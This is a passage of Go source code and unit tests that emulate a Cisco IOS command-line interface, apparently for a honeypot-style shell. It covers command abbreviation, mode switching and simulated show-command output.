if s, ok := v.(string); ok && s != "" {
return s
}
}
return defaultVal
}

View File

@@ -0,0 +1,531 @@
package cisco
import (
"testing"
)
// --- Abbreviation resolution tests ---
func TestResolveAbbreviationExact(t *testing.T) {
entries := []commandEntry{
{name: "show"},
{name: "shutdown"},
}
got, err := resolveAbbreviation("show", entries)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if got != "show" {
t.Errorf("got %q, want %q", got, "show")
}
}
func TestResolveAbbreviationUnique(t *testing.T) {
entries := []commandEntry{
{name: "show"},
{name: "enable"},
{name: "exit"},
}
got, err := resolveAbbreviation("sh", entries)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if got != "show" {
t.Errorf("got %q, want %q", got, "show")
}
}
func TestResolveAbbreviationAmbiguous(t *testing.T) {
entries := []commandEntry{
{name: "show"},
{name: "shutdown"},
}
_, err := resolveAbbreviation("sh", entries)
if err == nil {
t.Fatal("expected ambiguous error, got nil")
}
if err.Error() != "ambiguous" {
t.Errorf("got error %q, want %q", err.Error(), "ambiguous")
}
}
func TestResolveAbbreviationUnknown(t *testing.T) {
entries := []commandEntry{
{name: "show"},
{name: "enable"},
}
_, err := resolveAbbreviation("xyz", entries)
if err == nil {
t.Fatal("expected unknown error, got nil")
}
if err.Error() != "unknown" {
t.Errorf("got error %q, want %q", err.Error(), "unknown")
}
}
func TestResolveAbbreviationCaseInsensitive(t *testing.T) {
entries := []commandEntry{
{name: "show"},
{name: "enable"},
}
got, err := resolveAbbreviation("SH", entries)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if got != "show" {
t.Errorf("got %q, want %q", got, "show")
}
}
// --- Multi-word command resolution tests ---
func TestResolveCommandShowRunningConfig(t *testing.T) {
resolved, args, err := resolveCommand([]string{"sh", "run"}, privilegedExecCommands)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(args) != 0 {
t.Errorf("unexpected args: %v", args)
}
want := []string{"show", "running-config"}
if len(resolved) != len(want) {
t.Fatalf("resolved = %v, want %v", resolved, want)
}
for i := range want {
if resolved[i] != want[i] {
t.Errorf("resolved[%d] = %q, want %q", i, resolved[i], want[i])
}
}
}
func TestResolveCommandConfigureTerminal(t *testing.T) {
resolved, _, err := resolveCommand([]string{"conf", "t"}, privilegedExecCommands)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
want := []string{"configure", "terminal"}
if len(resolved) != len(want) {
t.Fatalf("resolved = %v, want %v", resolved, want)
}
for i := range want {
if resolved[i] != want[i] {
t.Errorf("resolved[%d] = %q, want %q", i, resolved[i], want[i])
}
}
}
func TestResolveCommandShowIPInterfaceBrief(t *testing.T) {
resolved, _, err := resolveCommand([]string{"sh", "ip", "int", "br"}, privilegedExecCommands)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
want := []string{"show", "ip", "interface", "brief"}
if len(resolved) != len(want) {
t.Fatalf("resolved = %v, want %v", resolved, want)
}
for i := range want {
if resolved[i] != want[i] {
t.Errorf("resolved[%d] = %q, want %q", i, resolved[i], want[i])
}
}
}
func TestResolveCommandWithArgs(t *testing.T) {
// "hostname MyRouter" → resolved=["hostname"], args=["MyRouter"]
resolved, args, err := resolveCommand([]string{"hostname", "MyRouter"}, globalConfigCommands)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(resolved) != 1 || resolved[0] != "hostname" {
t.Errorf("resolved = %v, want [hostname]", resolved)
}
if len(args) != 1 || args[0] != "MyRouter" {
t.Errorf("args = %v, want [MyRouter]", args)
}
}
func TestResolveCommandAmbiguous(t *testing.T) {
// In user exec, "e" matches "enable" and "exit" — ambiguous
_, _, err := resolveCommand([]string{"e"}, userExecCommands)
if err == nil {
t.Fatal("expected ambiguous error")
}
}
// --- Mode state machine tests ---
func TestPromptGeneration(t *testing.T) {
tests := []struct {
mode iosMode
want string
}{
{modeUserExec, "Router>"},
{modePrivilegedExec, "Router#"},
{modeGlobalConfig, "Router(config)#"},
{modeInterfaceConfig, "Router(config-if)#"},
}
for _, tt := range tests {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = tt.mode
if got := s.prompt(); got != tt.want {
t.Errorf("prompt(%d) = %q, want %q", tt.mode, got, tt.want)
}
}
}
func TestPromptAfterHostnameChange(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = modeGlobalConfig
s.dispatch("hostname Switch1")
if s.hostname != "Switch1" {
t.Fatalf("hostname = %q, want %q", s.hostname, "Switch1")
}
if got := s.prompt(); got != "Switch1(config)#" {
t.Errorf("prompt = %q, want %q", got, "Switch1(config)#")
}
}
func TestModeTransitions(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
// Start in user exec.
if s.mode != modeUserExec {
t.Fatalf("initial mode = %d, want %d", s.mode, modeUserExec)
}
// Can't skip to config mode directly from user exec.
result := s.dispatch("configure terminal")
if result.output == "" {
t.Error("expected error for conf t in user exec mode")
}
// Manually set privileged mode (enable tested separately).
s.mode = modePrivilegedExec
// conf t → global config
s.dispatch("configure terminal")
if s.mode != modeGlobalConfig {
t.Errorf("mode after conf t = %d, want %d", s.mode, modeGlobalConfig)
}
// interface Gi0/0 → interface config
s.dispatch("interface GigabitEthernet0/0")
if s.mode != modeInterfaceConfig {
t.Errorf("mode after interface = %d, want %d", s.mode, modeInterfaceConfig)
}
// exit → back to global config
s.dispatch("exit")
if s.mode != modeGlobalConfig {
t.Errorf("mode after exit from if-config = %d, want %d", s.mode, modeGlobalConfig)
}
// end → back to privileged exec
s.dispatch("end")
if s.mode != modePrivilegedExec {
t.Errorf("mode after end = %d, want %d", s.mode, modePrivilegedExec)
}
// disable → back to user exec
s.dispatch("disable")
if s.mode != modeUserExec {
t.Errorf("mode after disable = %d, want %d", s.mode, modeUserExec)
}
}
func TestEndFromInterfaceConfig(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = modeInterfaceConfig
s.currentIf = "GigabitEthernet0/0"
s.dispatch("end")
if s.mode != modePrivilegedExec {
t.Errorf("mode after end = %d, want %d", s.mode, modePrivilegedExec)
}
if s.currentIf != "" {
t.Errorf("currentIf = %q, want empty", s.currentIf)
}
}
func TestExitFromPrivilegedExec(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = modePrivilegedExec
result := s.dispatch("exit")
if !result.exit {
t.Error("expected exit=true from privileged exec exit")
}
}
// --- Show command output tests ---
func TestShowVersionContainsModel(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
output := showVersion(s)
if !contains(output, "C2960") {
t.Error("show version missing model")
}
if !contains(output, "15.0(2)SE11") {
t.Error("show version missing IOS version")
}
if !contains(output, "Router") {
t.Error("show version missing hostname")
}
}
func TestShowRunningConfigContainsInterfaces(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
output := showRunningConfig(s)
if !contains(output, "hostname Router") {
t.Error("running-config missing hostname")
}
if !contains(output, "interface GigabitEthernet0/0") {
t.Error("running-config missing interface")
}
if !contains(output, "ip address 192.168.1.1") {
t.Error("running-config missing IP address")
}
if !contains(output, "line vty") {
t.Error("running-config missing VTY config")
}
}
func TestShowRunningConfigWithEnableSecret(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "secret123")
output := showRunningConfig(s)
if !contains(output, "enable secret") {
t.Error("running-config missing enable secret when password is set")
}
}
func TestShowRunningConfigWithoutEnableSecret(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
output := showRunningConfig(s)
if contains(output, "enable secret") {
t.Error("running-config should not have enable secret when password is empty")
}
}
func TestShowIPInterfaceBrief(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
output := showIPInterfaceBrief(s)
if !contains(output, "GigabitEthernet0/0") {
t.Error("ip interface brief missing GigabitEthernet0/0")
}
if !contains(output, "192.168.1.1") {
t.Error("ip interface brief missing 192.168.1.1")
}
}
func TestShowIPRoute(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
output := showIPRoute(s)
if !contains(output, "directly connected") {
t.Error("ip route missing connected routes")
}
if !contains(output, "0.0.0.0/0") {
t.Error("ip route missing default route")
}
}
func TestShowVLANBrief(t *testing.T) {
output := showVLANBrief()
if !contains(output, "default") {
t.Error("vlan brief missing default vlan")
}
if !contains(output, "MGMT") {
t.Error("vlan brief missing MGMT vlan")
}
}
// --- Interface config tests ---
func TestInterfaceShutdownNoShutdown(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = modeInterfaceConfig
s.currentIf = "GigabitEthernet0/0"
s.dispatch("shutdown")
iface := s.findInterface("GigabitEthernet0/0")
if iface == nil {
t.Fatal("interface not found")
}
if !iface.shutdown {
t.Error("interface should be shutdown")
}
if iface.status != "administratively down" {
t.Errorf("status = %q, want %q", iface.status, "administratively down")
}
s.dispatch("no shutdown")
if iface.shutdown {
t.Error("interface should not be shutdown after no shutdown")
}
if iface.status != "up" {
t.Errorf("status = %q, want %q", iface.status, "up")
}
}
func TestInterfaceIPAddress(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = modeInterfaceConfig
s.currentIf = "GigabitEthernet0/0"
s.dispatch("ip address 10.10.10.1 255.255.255.0")
iface := s.findInterface("GigabitEthernet0/0")
if iface == nil {
t.Fatal("interface not found")
}
if iface.ip != "10.10.10.1" {
t.Errorf("ip = %q, want %q", iface.ip, "10.10.10.1")
}
if iface.mask != "255.255.255.0" {
t.Errorf("mask = %q, want %q", iface.mask, "255.255.255.0")
}
}
// --- Dispatch / invalid command tests ---
func TestInvalidCommandInUserExec(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
result := s.dispatch("foobar")
if !contains(result.output, "Invalid input") {
t.Errorf("expected invalid input error, got %q", result.output)
}
}
func TestAmbiguousCommandOutput(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
// "e" in user exec is ambiguous (enable, exit)
result := s.dispatch("e")
if !contains(result.output, "Ambiguous") {
t.Errorf("expected ambiguous error, got %q", result.output)
}
}
func TestHelpCommand(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
result := s.dispatch("?")
if !contains(result.output, "show") {
t.Error("help missing 'show'")
}
if !contains(result.output, "enable") {
t.Error("help missing 'enable'")
}
}
// --- Abbreviation integration tests ---
func TestShowAbbreviationInDispatch(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = modePrivilegedExec
result := s.dispatch("sh ver")
if !contains(result.output, "Cisco IOS Software") {
t.Error("'sh ver' should produce version output")
}
}
func TestConfTAbbreviation(t *testing.T) {
s := newIOSState("Router", "C2960", "15.0(2)SE11", "")
s.mode = modePrivilegedExec
s.dispatch("conf t")
if s.mode != modeGlobalConfig {
t.Errorf("mode after conf t = %d, want %d", s.mode, modeGlobalConfig)
}
}
// --- Enable command detection ---
func TestIsEnableCommand(t *testing.T) {
tests := []struct {
input string
want bool
}{
{"enable", true},
{"en", true},
{"ena", true},
{"e", false}, // too short (single char could be other commands)
{"enab", true},
{"ENABLE", true},
{"exit", false},
{"enable 15", false}, // has extra argument
}
for _, tt := range tests {
if got := isEnableCommand(tt.input); got != tt.want {
t.Errorf("isEnableCommand(%q) = %v, want %v", tt.input, got, tt.want)
}
}
}
// --- configString tests ---
func TestConfigString(t *testing.T) {
cfg := map[string]any{"hostname": "MySwitch"}
if got := configString(cfg, "hostname", "Router"); got != "MySwitch" {
t.Errorf("configString() = %q, want %q", got, "MySwitch")
}
if got := configString(cfg, "missing", "Default"); got != "Default" {
t.Errorf("configString() for missing = %q, want %q", got, "Default")
}
if got := configString(nil, "key", "Default"); got != "Default" {
t.Errorf("configString(nil) = %q, want %q", got, "Default")
}
}
// --- Helper ---
func TestMaskBits(t *testing.T) {
tests := []struct {
mask string
want int
}{
{"255.255.255.0", 24},
{"255.255.255.252", 30},
{"255.255.0.0", 16},
{"255.0.0.0", 8},
}
for _, tt := range tests {
if got := maskBits(tt.mask); got != tt.want {
t.Errorf("maskBits(%q) = %d, want %d", tt.mask, got, tt.want)
}
}
}
func TestNetworkFromIP(t *testing.T) {
tests := []struct {
ip, mask, want string
}{
{"192.168.1.1", "255.255.255.0", "192.168.1.0"},
{"10.0.0.1", "255.255.255.252", "10.0.0.0"},
{"172.16.5.100", "255.255.0.0", "172.16.0.0"},
}
for _, tt := range tests {
if got := networkFromIP(tt.ip, tt.mask); got != tt.want {
t.Errorf("networkFromIP(%q, %q) = %q, want %q", tt.ip, tt.mask, got, tt.want)
}
}
}
// --- Shell metadata ---
func TestShellNameAndDescription(t *testing.T) {
s := NewCiscoShell()
if s.Name() != "cisco" {
t.Errorf("Name() = %q, want %q", s.Name(), "cisco")
}
if s.Description() == "" {
t.Error("Description() should not be empty")
}
}
func contains(s, substr string) bool {
return len(s) >= len(substr) && containsHelper(s, substr)
}
func containsHelper(s, substr string) bool {
for i := 0; i <= len(s)-len(substr); i++ {
if s[i:i+len(substr)] == substr {
return true
}
}
return false
}

View File

@@ -0,0 +1,414 @@
package cisco
import (
"fmt"
"strings"
)
// commandResult holds the output of a command and whether the session should end.
type commandResult struct {
output string
exit bool
}
// commandEntry defines a single command with its name and optional sub-commands.
type commandEntry struct {
name string
subs []commandEntry // nil for leaf commands
}
// userExecCommands defines the command tree for user EXEC mode.
var userExecCommands = []commandEntry{
{name: "show", subs: []commandEntry{
{name: "version"},
{name: "clock"},
{name: "ip", subs: []commandEntry{
{name: "route"},
{name: "interface", subs: []commandEntry{
{name: "brief"},
}},
}},
{name: "interfaces"},
{name: "vlan", subs: []commandEntry{
{name: "brief"},
}},
}},
{name: "enable"},
{name: "exit"},
{name: "?"},
}
// privilegedExecCommands extends user commands for privileged mode.
var privilegedExecCommands = []commandEntry{
{name: "show", subs: []commandEntry{
{name: "version"},
{name: "clock"},
{name: "ip", subs: []commandEntry{
{name: "route"},
{name: "interface", subs: []commandEntry{
{name: "brief"},
}},
}},
{name: "interfaces"},
{name: "running-config"},
{name: "startup-config"},
{name: "vlan", subs: []commandEntry{
{name: "brief"},
}},
}},
{name: "configure", subs: []commandEntry{
{name: "terminal"},
}},
{name: "write", subs: []commandEntry{
{name: "memory"},
}},
{name: "copy"},
{name: "reload"},
{name: "disable"},
{name: "terminal", subs: []commandEntry{
{name: "length"},
}},
{name: "exit"},
{name: "?"},
}
// globalConfigCommands defines the command tree for global config mode.
var globalConfigCommands = []commandEntry{
{name: "hostname"},
{name: "interface"},
{name: "ip", subs: []commandEntry{
{name: "route"},
}},
{name: "no"},
{name: "end"},
{name: "exit"},
{name: "?"},
}
// interfaceConfigCommands defines the command tree for interface config mode.
var interfaceConfigCommands = []commandEntry{
{name: "ip", subs: []commandEntry{
{name: "address"},
}},
{name: "description"},
{name: "shutdown"},
{name: "no", subs: []commandEntry{
{name: "shutdown"},
}},
{name: "switchport", subs: []commandEntry{
{name: "mode"},
}},
{name: "end"},
{name: "exit"},
{name: "?"},
}
// commandsForMode returns the command tree for the given IOS mode.
func commandsForMode(mode iosMode) []commandEntry {
switch mode {
case modeUserExec:
return userExecCommands
case modePrivilegedExec:
return privilegedExecCommands
case modeGlobalConfig:
return globalConfigCommands
case modeInterfaceConfig:
return interfaceConfigCommands
default:
return userExecCommands
}
}
// resolveAbbreviation attempts to match an abbreviated word against a list of
// command entries. It returns the matched entry name, or an error string if
// ambiguous or unknown.
func resolveAbbreviation(word string, entries []commandEntry) (string, error) {
word = strings.ToLower(word)
var matches []string
for _, e := range entries {
if strings.ToLower(e.name) == word {
return e.name, nil // exact match
}
if strings.HasPrefix(strings.ToLower(e.name), word) {
matches = append(matches, e.name)
}
}
switch len(matches) {
case 0:
return "", fmt.Errorf("unknown")
case 1:
return matches[0], nil
default:
return "", fmt.Errorf("ambiguous")
}
}
// resolveCommand resolves a sequence of abbreviated words into the canonical
// command path (e.g., ["sh", "run"] → ["show", "running-config"]).
// It returns the resolved path, any remaining arguments, and an error if
// resolution fails.
func resolveCommand(words []string, entries []commandEntry) ([]string, []string, error) {
var resolved []string
current := entries
for i, w := range words {
name, err := resolveAbbreviation(w, current)
if err != nil {
if err.Error() == "unknown" && len(resolved) > 0 {
// Remaining words are arguments to the resolved command.
return resolved, words[i:], nil
}
return resolved, words[i:], err
}
resolved = append(resolved, name)
// Find sub-commands for the matched entry.
var nextLevel []commandEntry
for _, e := range current {
if e.name == name {
nextLevel = e.subs
break
}
}
if nextLevel == nil {
// Leaf command — rest are arguments.
return resolved, words[i+1:], nil
}
current = nextLevel
}
return resolved, nil, nil
}
// dispatch processes a command line in the context of the current IOS state.
func (s *iosState) dispatch(input string) commandResult {
words := strings.Fields(input)
if len(words) == 0 {
return commandResult{}
}
// Handle "?" as a help request.
if words[0] == "?" {
return s.cmdHelp()
}
cmds := commandsForMode(s.mode)
resolved, args, err := resolveCommand(words, cmds)
if err != nil {
if err.Error() == "ambiguous" {
return commandResult{output: fmt.Sprintf("%% Ambiguous command: \"%s\"", input)}
}
return commandResult{output: invalidInput(input)}
}
if len(resolved) == 0 {
return commandResult{output: invalidInput(input)}
}
cmd := strings.Join(resolved, " ")
switch s.mode {
case modeUserExec:
return s.dispatchUserExec(cmd, args)
case modePrivilegedExec:
return s.dispatchPrivilegedExec(cmd, args)
case modeGlobalConfig:
return s.dispatchGlobalConfig(cmd, args)
case modeInterfaceConfig:
return s.dispatchInterfaceConfig(cmd, args)
}
return commandResult{output: invalidInput(input)}
}
func (s *iosState) dispatchUserExec(cmd string, args []string) commandResult {
switch cmd {
case "show version":
return commandResult{output: showVersion(s)}
case "show clock":
return commandResult{output: showClock()}
case "show ip route":
return commandResult{output: showIPRoute(s)}
case "show ip interface brief":
return commandResult{output: showIPInterfaceBrief(s)}
case "show interfaces":
return commandResult{output: showInterfaces(s)}
case "show vlan brief":
return commandResult{output: showVLANBrief()}
case "enable":
return commandResult{} // handled in Handle() loop
case "exit":
return commandResult{exit: true}
}
return commandResult{output: invalidInput(cmd)}
}
func (s *iosState) dispatchPrivilegedExec(cmd string, args []string) commandResult {
switch cmd {
case "show version":
return commandResult{output: showVersion(s)}
case "show clock":
return commandResult{output: showClock()}
case "show ip route":
return commandResult{output: showIPRoute(s)}
case "show ip interface brief":
return commandResult{output: showIPInterfaceBrief(s)}
case "show interfaces":
return commandResult{output: showInterfaces(s)}
case "show running-config":
return commandResult{output: showRunningConfig(s)}
case "show startup-config":
return commandResult{output: showRunningConfig(s)} // same as running
case "show vlan brief":
return commandResult{output: showVLANBrief()}
case "configure terminal":
s.mode = modeGlobalConfig
return commandResult{output: "Enter configuration commands, one per line. End with CNTL/Z."}
case "write memory":
return commandResult{output: "[OK]"}
case "copy":
return commandResult{output: "[OK]"}
case "reload":
return commandResult{output: "System configuration has been modified. Save? [yes/no]: ", exit: true}
case "disable":
s.mode = modeUserExec
return commandResult{}
case "terminal length":
return commandResult{} // accept silently
case "exit":
return commandResult{exit: true}
}
return commandResult{output: invalidInput(cmd)}
}
func (s *iosState) dispatchGlobalConfig(cmd string, args []string) commandResult {
switch cmd {
case "hostname":
if len(args) < 1 {
return commandResult{output: "% Incomplete command."}
}
s.hostname = args[0]
return commandResult{}
case "interface":
if len(args) < 1 {
return commandResult{output: "% Incomplete command."}
}
ifName := strings.Join(args, "")
s.currentIf = ifName
s.mode = modeInterfaceConfig
return commandResult{}
case "ip route":
return commandResult{} // accept silently
case "no":
return commandResult{} // accept silently
case "end":
s.mode = modePrivilegedExec
return commandResult{}
case "exit":
s.mode = modePrivilegedExec
return commandResult{}
}
return commandResult{output: invalidInput(cmd)}
}
func (s *iosState) dispatchInterfaceConfig(cmd string, args []string) commandResult {
switch cmd {
case "ip address":
if len(args) < 2 {
return commandResult{output: "% Incomplete command."}
}
if iface := s.findInterface(s.currentIf); iface != nil {
iface.ip = args[0]
iface.mask = args[1]
}
return commandResult{}
case "description":
if len(args) < 1 {
return commandResult{output: "% Incomplete command."}
}
if iface := s.findInterface(s.currentIf); iface != nil {
iface.desc = strings.Join(args, " ")
}
return commandResult{}
case "shutdown":
if iface := s.findInterface(s.currentIf); iface != nil {
iface.shutdown = true
iface.status = "administratively down"
iface.protocol = "down"
}
return commandResult{}
case "no shutdown":
if iface := s.findInterface(s.currentIf); iface != nil {
iface.shutdown = false
iface.status = "up"
iface.protocol = "up"
}
return commandResult{}
case "switchport mode":
return commandResult{} // accept silently
case "end":
s.mode = modePrivilegedExec
s.currentIf = ""
return commandResult{}
case "exit":
s.mode = modeGlobalConfig
s.currentIf = ""
return commandResult{}
}
return commandResult{output: invalidInput(cmd)}
}
func (s *iosState) cmdHelp() commandResult {
cmds := commandsForMode(s.mode)
var b strings.Builder
for _, e := range cmds {
if e.name == "?" {
continue
}
b.WriteString(fmt.Sprintf(" %-20s %s\n", e.name, helpText(e.name)))
}
return commandResult{output: b.String()}
}
func helpText(name string) string {
switch name {
case "show":
return "Show running system information"
case "enable":
return "Turn on privileged commands"
case "disable":
return "Turn off privileged commands"
case "exit":
return "Exit from the EXEC"
case "configure":
return "Enter configuration mode"
case "write":
return "Write running configuration to memory"
case "copy":
return "Copy from one file to another"
case "reload":
return "Halt and perform a cold restart"
case "terminal":
return "Set terminal line parameters"
case "hostname":
return "Set system's network name"
case "interface":
return "Select an interface to configure"
case "ip":
return "Global IP configuration subcommands"
case "no":
return "Negate a command or set its defaults"
case "end":
return "Exit from configure mode"
case "description":
return "Interface specific description"
case "shutdown":
return "Shutdown the selected interface"
case "switchport":
return "Set switching mode characteristics"
default:
return ""
}
}
func invalidInput(input string) string {
return fmt.Sprintf("%% Invalid input detected at '^' marker.\n\n%s\n^", input)
}

View File

@@ -0,0 +1,234 @@
package cisco
import (
"fmt"
"math/rand"
"strings"
"time"
)
func showVersion(s *iosState) string {
days := 14 + rand.Intn(350)
hours := rand.Intn(24)
mins := rand.Intn(60)
return fmt.Sprintf(`Cisco IOS Software, %s Software (%s-UNIVERSALK9-M), Version %s, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2019 by Cisco Systems, Inc.
Compiled Thu 30-Jan-19 10:08 by prod_rel_team
ROM: Bootstrap program is %s boot loader
BOOTLDR: %s Boot Loader (C2960-HBOOT-M) Version 15.0(2r)SE, RELEASE SOFTWARE (fc1)
%s uptime is %d days, %d hours, %d minutes
System returned to ROM by power-on
System image file is "flash:/%s-universalk9-mz.SPA.%s.bin"
This product contains cryptographic features and is subject to United States
and local country laws governing import, export, transfer and use.
cisco %s (%s) processor (revision K0) with 524288K bytes of memory.
Processor board ID %s
Last reset from power-on
2 Gigabit Ethernet interfaces
1 Virtual Ethernet interface
64K bytes of flash-simulated non-volatile configuration memory.
Total of 65536K bytes of APC System Flash (Read/Write)
Configuration register is 0x2102`,
s.model, s.model, s.iosVersion,
s.model, s.model,
s.hostname, days, hours, mins,
s.model, s.iosVersion,
s.model, processorForModel(s.model),
s.serial,
)
}
func processorForModel(model string) string {
if strings.HasPrefix(model, "C29") {
return "PowerPC405"
}
return "MIPS"
}
func showClock() string {
now := time.Now().UTC()
return fmt.Sprintf("*%s UTC", now.Format("15:04:05.000 Mon Jan 2 2006"))
}
func showIPRoute(s *iosState) string {
var b strings.Builder
b.WriteString("Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP\n")
b.WriteString(" D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area\n")
b.WriteString(" N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2\n")
b.WriteString(" E1 - OSPF external type 1, E2 - OSPF external type 2\n")
b.WriteString(" i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2\n")
b.WriteString(" ia - IS-IS inter area, * - candidate default, U - per-user static route\n")
b.WriteString(" o - ODR, P - periodic downloaded static route\n\n")
b.WriteString("Gateway of last resort is 10.0.0.2 to network 0.0.0.0\n\n")
for _, iface := range s.interfaces {
if iface.ip == "unassigned" || iface.status != "up" {
continue
}
network := networkFromIP(iface.ip, iface.mask)
maskBits := maskBits(iface.mask)
fmt.Fprintf(&b, "C %s/%d is directly connected, %s\n", network, maskBits, iface.name)
}
b.WriteString("S* 0.0.0.0/0 [1/0] via 10.0.0.2")
return b.String()
}
func showIPInterfaceBrief(s *iosState) string {
var b strings.Builder
fmt.Fprintf(&b, "%-25s %-15s %-4s %-7s %-22s %s\n",
"Interface", "IP-Address", "OK?", "Method", "Status", "Protocol")
for _, iface := range s.interfaces {
ip := iface.ip
if ip == "" {
ip = "unassigned"
}
fmt.Fprintf(&b, "%-25s %-15s YES manual %-22s %s\n",
iface.name, ip, iface.status, iface.protocol)
}
return b.String()
}
func showInterfaces(s *iosState) string {
var b strings.Builder
for i, iface := range s.interfaces {
if i > 0 {
b.WriteString("\n")
}
upDown := "up"
if iface.shutdown {
upDown = "administratively down"
}
fmt.Fprintf(&b, "%s is %s, line protocol is %s\n", iface.name, upDown, iface.protocol)
fmt.Fprintf(&b, " Hardware is Gigabit Ethernet, address is %s (bia %s)\n", iface.mac, iface.mac)
if iface.ip != "unassigned" && iface.ip != "" {
fmt.Fprintf(&b, " Internet address is %s/%d\n", iface.ip, maskBits(iface.mask))
}
fmt.Fprintf(&b, " MTU %d bytes, BW %s sec, DLY 10 usec,\n", iface.mtu, iface.bandwidth)
b.WriteString(" reliability 255/255, txload 1/255, rxload 1/255\n")
b.WriteString(" Encapsulation ARPA, loopback not set\n")
fmt.Fprintf(&b, " %d packets input, %d bytes, 0 no buffer\n", iface.rxPackets, iface.rxBytes)
fmt.Fprintf(&b, " %d packets output, %d bytes, 0 underruns", iface.txPackets, iface.txBytes)
}
return b.String()
}
func showRunningConfig(s *iosState) string {
var b strings.Builder
b.WriteString("Building configuration...\n\n")
b.WriteString("Current configuration : 1482 bytes\n")
b.WriteString("!\n")
b.WriteString("! Last configuration change at 14:32:22 UTC Mon Feb 10 2025\n")
b.WriteString("!\n")
b.WriteString("version 15.0\n")
b.WriteString("service timestamps debug datetime msec\n")
b.WriteString("service timestamps log datetime msec\n")
b.WriteString("no service password-encryption\n")
b.WriteString("!\n")
fmt.Fprintf(&b, "hostname %s\n", s.hostname)
b.WriteString("!\n")
b.WriteString("boot-start-marker\n")
b.WriteString("boot-end-marker\n")
b.WriteString("!\n")
if s.enablePass != "" {
b.WriteString("enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0\n")
}
b.WriteString("!\n")
b.WriteString("no aaa new-model\n")
b.WriteString("!\n")
for _, iface := range s.interfaces {
b.WriteString("!\n")
fmt.Fprintf(&b, "interface %s\n", iface.name)
if iface.desc != "" {
fmt.Fprintf(&b, " description %s\n", iface.desc)
}
if iface.ip != "unassigned" && iface.ip != "" {
fmt.Fprintf(&b, " ip address %s %s\n", iface.ip, iface.mask)
} else {
b.WriteString(" no ip address\n")
}
if iface.shutdown {
b.WriteString(" shutdown\n")
}
}
b.WriteString("!\n")
b.WriteString("ip forward-protocol nd\n")
b.WriteString("!\n")
b.WriteString("ip route 0.0.0.0 0.0.0.0 10.0.0.2\n")
b.WriteString("!\n")
b.WriteString("access-list 10 permit 192.168.1.0 0.0.0.255\n")
b.WriteString("access-list 10 deny any\n")
b.WriteString("!\n")
b.WriteString("line con 0\n")
b.WriteString(" logging synchronous\n")
b.WriteString("line vty 0 4\n")
b.WriteString(" login local\n")
b.WriteString(" transport input ssh\n")
b.WriteString("!\n")
b.WriteString("end")
return b.String()
}
func showVLANBrief() string {
var b strings.Builder
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "VLAN", "Name", "Status", "Ports")
b.WriteString("---- -------------------------------- --------- -------------------------------\n")
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "1", "default", "active", "Gi0/0, Gi0/1, Gi0/2")
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "10", "MGMT", "active", "")
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "20", "USERS", "active", "")
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "99", "NATIVE", "active", "")
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "1002", "fddi-default", "act/unsup", "")
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "1003", "token-ring-default", "act/unsup", "")
fmt.Fprintf(&b, "%-6s %-32s %-10s %s", "1004", "fddinet-default", "act/unsup", "")
return b.String()
}
// networkFromIP derives the network address from an IP and mask.
func networkFromIP(ip, mask string) string {
ipParts := parseIPv4(ip)
maskParts := parseIPv4(mask)
if ipParts == nil || maskParts == nil {
return ip
}
return fmt.Sprintf("%d.%d.%d.%d",
ipParts[0]&maskParts[0],
ipParts[1]&maskParts[1],
ipParts[2]&maskParts[2],
ipParts[3]&maskParts[3],
)
}
func maskBits(mask string) int {
parts := parseIPv4(mask)
if parts == nil {
return 24
}
bits := 0
for _, p := range parts {
for i := 7; i >= 0; i-- {
if p&(1<<uint(i)) != 0 {
bits++
} else {
return bits
}
}
}
return bits
}
func parseIPv4(s string) []int {
var a, b, c, d int
n, _ := fmt.Sscanf(s, "%d.%d.%d.%d", &a, &b, &c, &d)
if n != 4 {
return nil
}
return []int{a, b, c, d}
}

View File

@@ -0,0 +1,109 @@
package cisco
import "fmt"
// iosMode represents the current CLI mode of the IOS state machine.
type iosMode int
const (
modeUserExec iosMode = iota // Router>
modePrivilegedExec // Router#
modeGlobalConfig // Router(config)#
modeInterfaceConfig // Router(config-if)#
)
// ifaceInfo holds interface metadata for show commands.
type ifaceInfo struct {
name string
ip string
mask string
status string
protocol string
mac string
bandwidth string
mtu int
rxPackets int
txPackets int
rxBytes int
txBytes int
shutdown bool
desc string
}
